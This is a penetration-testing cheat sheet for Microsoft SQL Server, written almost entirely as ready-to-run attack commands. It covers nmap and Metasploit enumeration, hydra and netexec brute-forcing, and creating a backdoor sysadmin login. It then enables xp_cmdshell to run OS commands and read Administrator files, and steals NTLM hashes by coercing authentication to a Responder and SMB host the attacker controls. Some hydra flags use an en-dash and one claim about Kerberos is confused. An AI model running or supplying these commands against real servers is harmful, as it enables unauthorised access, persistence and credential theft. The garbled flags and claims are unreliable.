MSSQL (Microsoft SQL) Pentesting
MSSQL is a relational database management system. A default port is 1433.
- https://book.hacktricks.xyz/network-services-pentesting/pentesting-mssql-microsoft-sql-server
- https://learn.microsoft.com/en-us/sql/database-engine/configure-windows/xp-cmdshell-server-configuration-option?view=sql-server-ver16
Enumeration
nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>
# MSDAT: https://github.com/quentinhardy/msdat
# all: Enumerate with all modules
python3 msdat.py all -s example.com
# -D, -U, -P: Use Windows authentication
python3 msdat.py all -s example.com -D domain -U username -P password
# xpdirectory: List directories in system
python3 msdat.py xpdirectory -s manager.htb -D manager -U operator -P operator -d master --list-files 'C:\'
# bulkopen: Read/download files
python3 msdat.py bulkopen -s example.com -D domain -U username -P password -d database --read-file 'C:\Users\Administrator\Desktop\example.txt'
# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump
Brute Force Credentials
netexec mssql <target-ip> -u username -p passwords.txt
hydra -L usernames.txt –p password <target-ip> mssql
hydra -l username –P passwords.txt <target-ip> mssql
Password Spraying Attack
If we found the specific user password, we might be able to find another user with the same password.
Connect
# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth
# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database
Commands
# Get the version of MSSQL
> SELECT @@version
# Get current username
> SELECT user_name()
# Get all users
> SELECT * FROM sys.database_principals
# Get databases
> SELECT * FROM master.dbo.sysdatabases
# Switch to the database
> USE <database>
# List tables
> SELECT * FROM information_schema.tables
# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>
# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'
# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers
# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'
# List directories
> xp_dirtree '.\'
> xp_dirtree 'C:\inetpub\'
> xp_dirtree 'C:\inetpub\wwwroot\'
> xp_dirtree 'C:\Users\'
Spawn a Windows Command Shell and Run Commands using Impacket
If we connected MSSQL using impacket, we can exeucte the Windows Shell Commands by "enable_xp_cmdshell".
Enable/Disable a Windows Shell
> enable_xp_cmdshell
> disable_xp_cmdshell
# or
# Enable advanced options
> EXEC sp_configure 'show advanced options', 1;
# Update the currently configured value for the advanced options
> RECONFIGURE;
# Enable the command shell
> EXEC sp_configure 'xp_cmdshell', 1;
# Update the currently configured value for the command shell
> RECONFIGURE;
Commands
We can execute commands the same as Windows Command Prompt.
# Get current user
> xp_cmdshell whoami
# Show files and directories
> xp_cmdshell dir
> xp_cmdshell dir \Users
# Show hidden files
> xp_cmdshell dir /a
# Get current directory
> xp_cmdshell cd
# Get contents of file
> xp_cmdshell more \Users\Administrator\example.txt
> xp_cmdshell type \Users\Administrator\example.txt
Privilege Escalation
Get NTLM Hash
MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.
1. Start SMB Server and Responder
First we need to start a SMB server and Responder in each terminal.
# In terminal 1
sudo responder -I <interface>
# In terminal 2
sudo impacket-smbserver share ./ -smb2support
# In terminal 3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
2. Execute with Metasploit
In msfconsole, select the following module.
We need to set the SMBPROXY
option to the Responder IP (this ip is displayed when starting Responder in terminal).
msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
# If we use Windows credential, set as below:
msf> set use_windows_authent true
msf> set smbproxy <responder_ip>
msf> run
When executing, we can see the NTLM hash in the terminal where SMB server is running.